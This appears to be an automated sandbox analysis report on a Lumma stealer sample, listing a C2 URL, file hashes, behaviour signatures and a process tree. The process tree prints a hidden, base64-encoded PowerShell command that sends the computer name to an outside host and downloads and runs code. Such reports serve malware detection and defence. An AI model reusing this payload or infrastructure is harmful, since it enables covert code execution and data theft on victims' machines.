Overview
overview
10Static
static
3183c6aa694...90.exe
windows7-x64
10183c6aa694...90.exe
windows10-2004-x64
8install.exe
windows7-x64
10install.exe
windows10-2004-x64
8jre/Welcome.html
windows7-x64
3jre/Welcome.html
windows10-2004-x64
3jre/bin/JA...32.dll
windows7-x64
3jre/bin/JA...32.dll
windows10-2004-x64
3jre/bin/JA...ge.dll
windows7-x64
3jre/bin/JA...ge.dll
windows10-2004-x64
3jre/bin/Ja...32.dll
windows7-x64
3jre/bin/Ja...32.dll
windows10-2004-x64
3jre/bin/Ja...ge.dll
windows7-x64
3jre/bin/Ja...ge.dll
windows10-2004-x64
3jre/bin/Wi...32.dll
windows7-x64
3jre/bin/Wi...32.dll
windows10-2004-x64
3jre/bin/Wi...ge.dll
windows7-x64
3jre/bin/Wi...ge.dll
windows10-2004-x64
3jre/bin/awt.dll
windows7-x64
3jre/bin/awt.dll
windows10-2004-x64
3jre/bin/bci.dll
windows7-x64
3jre/bin/bci.dll
windows10-2004-x64
3jre/bin/cl...vm.dll
windows7-x64
3jre/bin/cl...vm.dll
windows10-2004-x64
3jre/bin/dcpr.dll
windows7-x64
3jre/bin/dcpr.dll
windows10-2004-x64
3jre/bin/de...se.dll
windows7-x64
3jre/bin/de...se.dll
windows10-2004-x64
3jre/bin/deploy.dll
windows7-x64
3jre/bin/deploy.dll
windows10-2004-x64
3jre/bin/dt_shmem.dll
windows7-x64
3jre/bin/dt_shmem.dll
windows10-2004-x64
3Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-11-2024 02:08
Static task
static1
Behavioral task
behavioral1
Sample
183c6aa694124103e3896ee7b71175f4a81d9533218617cb80d60d9307b53c90.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
183c6aa694124103e3896ee7b71175f4a81d9533218617cb80d60d9307b53c90.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
install.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
install.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
jre/Welcome.html
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
jre/Welcome.html
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
jre/bin/JAWTAccessBridge-32.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
jre/bin/JAWTAccessBridge-32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
jre/bin/JAWTAccessBridge.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
jre/bin/JAWTAccessBridge.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
jre/bin/JavaAccessBridge-32.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
jre/bin/JavaAccessBridge-32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
jre/bin/JavaAccessBridge.dll
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
jre/bin/JavaAccessBridge.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
jre/bin/WindowsAccessBridge-32.dll
Resource
win7-20241023-en
Behavioral task
behavioral16
Sample
jre/bin/WindowsAccessBridge-32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
jre/bin/WindowsAccessBridge.dll
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
jre/bin/WindowsAccessBridge.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
jre/bin/awt.dll
Resource
win7-20241010-en
Behavioral task
behavioral20
Sample
jre/bin/awt.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
jre/bin/bci.dll
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
jre/bin/bci.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
jre/bin/client/jvm.dll
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
jre/bin/client/jvm.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
jre/bin/dcpr.dll
Resource
win7-20241010-en
Behavioral task
behavioral26
Sample
jre/bin/dcpr.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
jre/bin/decora_sse.dll
Resource
win7-20240708-en
Behavioral task
behavioral28
Sample
jre/bin/decora_sse.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
jre/bin/deploy.dll
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
jre/bin/deploy.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
jre/bin/dt_shmem.dll
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
jre/bin/dt_shmem.dll
Resource
win10v2004-20241007-en
General
-
Target
install.exe
-
Size
136KB
-
MD5
fca89c62d6ea9f979b3a8d21ee2c4f55
-
SHA1
bd77809998b5cfef93e3c34af3ddb8292f549d44
-
SHA256
6b069e5b450898615e709275bc0a53b529f171301a603093bdc17ebd784e0e34
-
SHA512
f1f1f30d0c07c343d9709dd4a6405751de678886703bd59f2d72751f3d470ca88389b3ce3ba5966282e6f60ae68f13de722e885f4bd1bfae2aad60323edf7df0
-
SSDEEP
1536:xZ2FWSNhd/4131iO08SKKAP7wBwp8wZtE:T2ddQ131i1pKJP7w2p
Malware Config
Extracted
lumma
https://quotedjizwe.cyou/api
Signatures
-
Lumma family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2756 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 1588 EASteamProxy.exe 792 EASteamProxy.exe -
Loads dropped DLL 20 IoCs
pid Process 2224 cmd.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 1588 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 pastebin.com 3 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 792 set thread context of 2524 792 EASteamProxy.exe 66 -
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language javaw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2756 powershell.exe 1588 EASteamProxy.exe 792 EASteamProxy.exe 792 EASteamProxy.exe 2524 cmd.exe 2524 cmd.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 792 EASteamProxy.exe 2524 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1864 WMIC.exe Token: SeSecurityPrivilege 1864 WMIC.exe Token: SeTakeOwnershipPrivilege 1864 WMIC.exe Token: SeLoadDriverPrivilege 1864 WMIC.exe Token: SeSystemProfilePrivilege 1864 WMIC.exe Token: SeSystemtimePrivilege 1864 WMIC.exe Token: SeProfSingleProcessPrivilege 1864 WMIC.exe Token: SeIncBasePriorityPrivilege 1864 WMIC.exe Token: SeCreatePagefilePrivilege 1864 WMIC.exe Token: SeBackupPrivilege 1864 WMIC.exe Token: SeRestorePrivilege 1864 WMIC.exe Token: SeShutdownPrivilege 1864 WMIC.exe Token: SeDebugPrivilege 1864 WMIC.exe Token: SeSystemEnvironmentPrivilege 1864 WMIC.exe Token: SeRemoteShutdownPrivilege 1864 WMIC.exe Token: SeUndockPrivilege 1864 WMIC.exe Token: SeManageVolumePrivilege 1864 WMIC.exe Token: 33 1864 WMIC.exe Token: 34 1864 WMIC.exe Token: 35 1864 WMIC.exe Token: SeIncreaseQuotaPrivilege 1864 WMIC.exe Token: SeSecurityPrivilege 1864 WMIC.exe Token: SeTakeOwnershipPrivilege 1864 WMIC.exe Token: SeLoadDriverPrivilege 1864 WMIC.exe Token: SeSystemProfilePrivilege 1864 WMIC.exe Token: SeSystemtimePrivilege 1864 WMIC.exe Token: SeProfSingleProcessPrivilege 1864 WMIC.exe Token: SeIncBasePriorityPrivilege 1864 WMIC.exe Token: SeCreatePagefilePrivilege 1864 WMIC.exe Token: SeBackupPrivilege 1864 WMIC.exe Token: SeRestorePrivilege 1864 WMIC.exe Token: SeShutdownPrivilege 1864 WMIC.exe Token: SeDebugPrivilege 1864 WMIC.exe Token: SeSystemEnvironmentPrivilege 1864 WMIC.exe Token: SeRemoteShutdownPrivilege 1864 WMIC.exe Token: SeUndockPrivilege 1864 WMIC.exe Token: SeManageVolumePrivilege 1864 WMIC.exe Token: 33 1864 WMIC.exe Token: 34 1864 WMIC.exe Token: 35 1864 WMIC.exe Token: SeIncreaseQuotaPrivilege 1160 WMIC.exe Token: SeSecurityPrivilege 1160 WMIC.exe Token: SeTakeOwnershipPrivilege 1160 WMIC.exe Token: SeLoadDriverPrivilege 1160 WMIC.exe Token: SeSystemProfilePrivilege 1160 WMIC.exe Token: SeSystemtimePrivilege 1160 WMIC.exe Token: SeProfSingleProcessPrivilege 1160 WMIC.exe Token: SeIncBasePriorityPrivilege 1160 WMIC.exe Token: SeCreatePagefilePrivilege 1160 WMIC.exe Token: SeBackupPrivilege 1160 WMIC.exe Token: SeRestorePrivilege 1160 WMIC.exe Token: SeShutdownPrivilege 1160 WMIC.exe Token: SeDebugPrivilege 1160 WMIC.exe Token: SeSystemEnvironmentPrivilege 1160 WMIC.exe Token: SeRemoteShutdownPrivilege 1160 WMIC.exe Token: SeUndockPrivilege 1160 WMIC.exe Token: SeManageVolumePrivilege 1160 WMIC.exe Token: 33 1160 WMIC.exe Token: 34 1160 WMIC.exe Token: 35 1160 WMIC.exe Token: SeIncreaseQuotaPrivilege 1160 WMIC.exe Token: SeSecurityPrivilege 1160 WMIC.exe Token: SeTakeOwnershipPrivilege 1160 WMIC.exe Token: SeLoadDriverPrivilege 1160 WMIC.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2716 javaw.exe 2716 javaw.exe 992 AcroRd32.exe 992 AcroRd32.exe 992 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2700 wrote to memory of 2716 2700 install.exe 31 PID 2700 wrote to memory of 2716 2700 install.exe 31 PID 2700 wrote to memory of 2716 2700 install.exe 31 PID 2700 wrote to memory of 2716 2700 install.exe 31 PID 2700 wrote to memory of 2716 2700 install.exe 31 PID 2700 wrote to memory of 2716 2700 install.exe 31 PID 2700 wrote to memory of 2716 2700 install.exe 31 PID 2716 wrote to memory of 1676 2716 javaw.exe 32 PID 2716 wrote to memory of 1676 2716 javaw.exe 32 PID 2716 wrote to memory of 1676 2716 javaw.exe 32 PID 2716 wrote to memory of 1676 2716 javaw.exe 32 PID 2716 wrote to memory of 1676 2716 javaw.exe 32 PID 2716 wrote to memory of 1676 2716 javaw.exe 32 PID 2716 wrote to memory of 1676 2716 javaw.exe 32 PID 1676 wrote to memory of 2372 1676 cmd.exe 34 PID 1676 wrote to memory of 2372 1676 cmd.exe 34 PID 1676 wrote to memory of 2372 1676 cmd.exe 34 PID 1676 wrote to memory of 2372 1676 cmd.exe 34 PID 1676 wrote to memory of 2372 1676 cmd.exe 34 PID 1676 wrote to memory of 2372 1676 cmd.exe 34 PID 1676 wrote to memory of 2372 1676 cmd.exe 34 PID 1676 wrote to memory of 3008 1676 cmd.exe 35 PID 1676 wrote to memory of 3008 1676 cmd.exe 35 PID 1676 wrote to memory of 3008 1676 cmd.exe 35 PID 1676 wrote to memory of 3008 1676 cmd.exe 35 PID 2716 wrote to memory of 3004 2716 javaw.exe 36 PID 2716 wrote to memory of 3004 2716 javaw.exe 36 PID 2716 wrote to memory of 3004 2716 javaw.exe 36 PID 2716 wrote to memory of 3004 2716 javaw.exe 36 PID 2716 wrote to memory of 3004 2716 javaw.exe 36 PID 2716 wrote to memory of 3004 2716 javaw.exe 36 PID 2716 wrote to memory of 3004 2716 javaw.exe 36 PID 3004 wrote to memory of 2540 3004 cmd.exe 38 PID 3004 wrote to memory of 2540 3004 cmd.exe 38 PID 3004 wrote to memory of 2540 3004 cmd.exe 38 PID 3004 wrote to memory of 2540 3004 cmd.exe 38 PID 3004 wrote to memory of 2540 3004 cmd.exe 38 PID 3004 wrote to memory of 2540 3004 cmd.exe 38 PID 3004 wrote to memory of 2540 3004 cmd.exe 38 PID 3004 wrote to memory of 1864 3004 cmd.exe 39 PID 3004 wrote to memory of 1864 3004 cmd.exe 39 PID 3004 wrote to memory of 1864 3004 cmd.exe 39 PID 3004 wrote to memory of 1864 3004 cmd.exe 39 PID 3004 wrote to memory of 1864 3004 cmd.exe 39 PID 3004 wrote to memory of 1864 3004 cmd.exe 39 PID 3004 wrote to memory of 1864 3004 cmd.exe 39 PID 3004 wrote to memory of 772 3004 cmd.exe 40 PID 3004 wrote to memory of 772 3004 cmd.exe 40 PID 3004 wrote to memory of 772 3004 cmd.exe 40 PID 3004 wrote to memory of 772 3004 cmd.exe 40 PID 3004 wrote to memory of 772 3004 cmd.exe 40 PID 3004 wrote to memory of 772 3004 cmd.exe 40 PID 3004 wrote to memory of 772 3004 cmd.exe 40 PID 2716 wrote to memory of 2512 2716 javaw.exe 42 PID 2716 wrote to memory of 2512 2716 javaw.exe 42 PID 2716 wrote to memory of 2512 2716 javaw.exe 42 PID 2716 wrote to memory of 2512 2716 javaw.exe 42 PID 2716 wrote to memory of 2512 2716 javaw.exe 42 PID 2716 wrote to memory of 2512 2716 javaw.exe 42 PID 2716 wrote to memory of 2512 2716 javaw.exe 42 PID 2512 wrote to memory of 1144 2512 cmd.exe 44 PID 2512 wrote to memory of 1144 2512 cmd.exe 44 PID 2512 wrote to memory of 1144 2512 cmd.exe 44 PID 2512 wrote to memory of 1144 2512 cmd.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 650014⤵
- System Location Discovery: System Language Discovery
PID:2372
-
-
C:\Windows\system32\reg.exeC:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"4⤵PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8664⤵
- System Location Discovery: System Language Discovery
PID:2540
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com4⤵
- System Location Discovery: System Language Discovery
PID:772
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8664⤵
- System Location Discovery: System Language Discovery
PID:1144
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com4⤵
- System Location Discovery: System Language Discovery
PID:2364
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"3⤵
- System Location Discovery: System Language Discovery
PID:836 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8664⤵
- System Location Discovery: System Language Discovery
PID:1616
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List4⤵
- System Location Discovery: System Language Discovery
PID:1636
-
-
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com4⤵
- System Location Discovery: System Language Discovery
PID:2520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""3⤵
- System Location Discovery: System Language Discovery
PID:956 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 650014⤵
- System Location Discovery: System Language Discovery
PID:272
-
-
C:\Windows\system32\reg.exeC:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"4⤵PID:968
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('DQokcj0naHR0cDovL2NhdHNpLm5ldC9pbmNhbGwucGhwP2NvbXBOYW1lPScrJGVudjpjb21wdXRlcm5hbWU7IFtuZXQuU2VydmljRXBPaU50bUFuYWdlUl06OnNFQ3VyaVRZcFJPVG9jT2wgPSBbbkVULnNlQ1VSSVR5cFJPVG9jb0xUWXBlXTo6VGxzMTI7ICR0dHAgPSBpd3IgJHIgLVVzZUJhc2ljUGFyc2luZyAtVXNlckFnZW50ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQ0NC4xNDMgU2FmYXJpLzUzNy4zNic7IGlleCAkdHRwLkNvbnRlbnQ7')); Invoke-Expression $script}"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2756
-
-
C:\Windows\SysWOW64\cmd.execmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/a669a9b5df507d7574a94fbd2fc87144/" && (for %F in (*.exe) do start "" "%F")"3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2224 -
C:\Users\Admin\AppData\Local\Temp\a669a9b5df507d7574a94fbd2fc87144\EASteamProxy.exe"EASteamProxy.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1588 -
C:\Users\Admin\AppData\Roaming\Serverdownload\EASteamProxy.exeC:\Users\Admin\AppData\Roaming\Serverdownload\EASteamProxy.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:792 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2524 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- System Location Discovery: System Language Discovery
PID:1816
-
-
-
-
-
-
C:\Windows\SysWOW64\explorer.exeexplorer C:\Users\Admin\AppData\Local\Temp\eedc4ecf5411a44543d78936d137ddf3.pdf3⤵
- System Location Discovery: System Language Discovery
PID:1800
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:2616
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\eedc4ecf5411a44543d78936d137ddf3.pdf"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:992
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.0MB
MD57c986d80f20a9fcf5bc4c830137b26ce
SHA1bcdd68c5ef1d03874468f5ba779f486318e13dcf
SHA256c37b2d07d08c297153d6e34fd514090883b766536bda4341b3d3af677c8da16c
SHA5122a6b5716ae93b544fbeab675fa9247603c887cac6b32ec332fed24d6e2e825da7c0da33e850941e4e730366dfd6bb1dc57c809dfaf3b562b19b1ecfd956f09a2
-
Filesize
5.4MB
MD5ad2735f096925010a53450cb4178c89e
SHA1c6d65163c6315a642664f4eaec0fae9528549bfe
SHA2564e775b5fafb4e6d89a4694f8694d2b8b540534bd4a52ff42f70095f1c929160e
SHA5121868b22a7c5cba89545b06f010c09c5418b3d86039099d681eee9567c47208fdba3b89c6251cf03c964c58c805280d45ba9c3533125f6bd3e0bc067477e03ab9
-
Filesize
564KB
MD51ba6d1cf0508775096f9e121a24e5863
SHA1df552810d779476610da3c8b956cc921ed6c91ae
SHA25674892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823
SHA5129887d9f5838aa1555ea87968e014edfe2f7747f138f1b551d1f609bc1d5d8214a5fdab0d76fcac98864c1da5eb81405ca373b2a30cb12203c011d89ea6d069af
-
Filesize
6.0MB
MD52a7f32421b71aaeebd6287f55acdf983
SHA1217db3af7575622d58f94845b7ee6ceffd6e1c0f
SHA256d0e476c7573735b01ba7893b7e513ac463316b50b5d6e238878a8567b0b1bc86
SHA512b5839c867d3ea09f0796482f8040ed5ebb9ddf9917df8ce76ed675e377af97ab0ac06917af0c2d8401afa30c5deb7052e7218c779dd731c7774ca10dc1306bf5
-
Filesize
1.3MB
MD5c24c89879410889df656e3a961c59bcc
SHA125a9e4e545e86b0a5fe14ee0147746667892fabd
SHA256739bedcfc8eb860927eb2057474be5b39518aaaa6703f9f85307a432fa1f236e
SHA5120542c431049e4fd40619579062d206396bef2f6dadadbf9294619c918b9e6c96634dcd404b78c6045974295126ec35dd842c6ec8f42279d9598b57a751cd0034
-
Filesize
106KB
MD549c96cecda5c6c660a107d378fdfc3d4
SHA100149b7a66723e3f0310f139489fe172f818ca8e
SHA25669320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d
-
Filesize
48KB
MD5cf0a1c4776ffe23ada5e570fc36e39fe
SHA12050fadecc11550ad9bde0b542bcf87e19d37f1a
SHA2566fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47
SHA512d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168
-
Filesize
19KB
MD55df7aef6e2e2691eb57558a45eba260e
SHA1a9e9053a5a2810f89ff349c5e6bfc98a5271750f
SHA25693aa2b9642df06986e0cf718a3708d22a30ced07e93c1d16f999f456de982a17
SHA5121432dc775add2f5ec4c30964fcd58f5e2dde836ebdc10cf9f2404a0e2915d98c89cfc310d2ec16b51c2a3791352c4096d33715628d58db5064d65c35578c0789
-
Filesize
799KB
MD5e2658cb392d04822f8d80aad17f8f9ce
SHA1a5a93b010269939482714985b5bcea25e806088d
SHA256aec797462aad55a6b688ceb5e1c83c874c3828d4dfc8f2460e5c01342f7728e4
SHA51231c95479e522d589a0f659a0af0e771ba5634c1515fcffb161b09c97ae60834266846a640bf3a18969a618d1bcb9eff5161bb54108d47b4379fdbaba2a8b67b6
-
Filesize
2.7MB
MD528dea3e780552eb5c53b3b9b1f556628
SHA155dccd5b30ce0363e8ebdfeb1cca38d1289748b8
SHA25652415829d85c06df8724a3d3d00c98f12beabf5d6f3cbad919ec8000841a86e8
SHA51219dfe5f71901e43ea34d257f693ae1a36433dbdbcd7c9440d9b0f9eea24de65c4a8fe332f7b88144e1a719a6ba791c2048b4dd3e5b1ed0fdd4c813603ad35112
-
Filesize
669KB
MD54ad03043a32e9a1ef64115fc1ace5787
SHA1352e0e3a628c8626cff7eed348221e889f6a25c4
SHA256a0e43cbc4a2d8d39f225abd91980001b7b2b5001e8b2b8292537ae39b17b85d1
SHA512edfae3660a5f19a9deda0375efba7261d211a74f1d8b6bf1a8440fed4619c4b747aca8301d221fd91230e7af1dab73123707cc6eda90e53eb8b6b80872689ba6
-
Filesize
291KB
MD56b4ab6e60364c55f18a56a39021b74a6
SHA139cac2889d8ca497ee0d8434fc9f6966f18fa336
SHA2561db3fd414039d3e5815a5721925dd2e0a3a9f2549603c6cab7c49b84966a1af3
SHA512c08de8c6e331d13dfe868ab340e41552fc49123a9f782a5a63b95795d5d979e68b5a6ab171153978679c0791dc3e3809c883471a05864041ce60b240ccdd4c21
-
Filesize
51KB
MD5acfffe6de49ab6bbcb590e95d558111b
SHA151d7b4a4ef2851f4787805bd2eebc61f9f62ae34
SHA256fd0bc347f27e479b565d6095bfdc96ef2f42a7ae8649c40e1e702c8f16ab6217
SHA51294fd4a2de31420576169b79c9617fb1eed4778fb50c17a9c8587b123169022e9338fe8d4b89bb5de5b06367eed6737e739423416c8be3f7f5f24b75b3b3ee28e
-
Filesize
3KB
MD54f33b5a78d952db07585df93c5ad5d20
SHA1367e6e8bb93a72524ee9bd1c05e089c4ba557b42
SHA25663e52c85b6116aaba909ee38a010586c38e0bbfbfd6c19c379885302d6b82f24
SHA5127094524655ecb8036cb8004fbac0c7901a96c19bb0583de4687ba2d4ccd79292864ebc6124b8b287a6c47201be4debc3ee14ca93413ba7b8570cb8ae7bc23a46
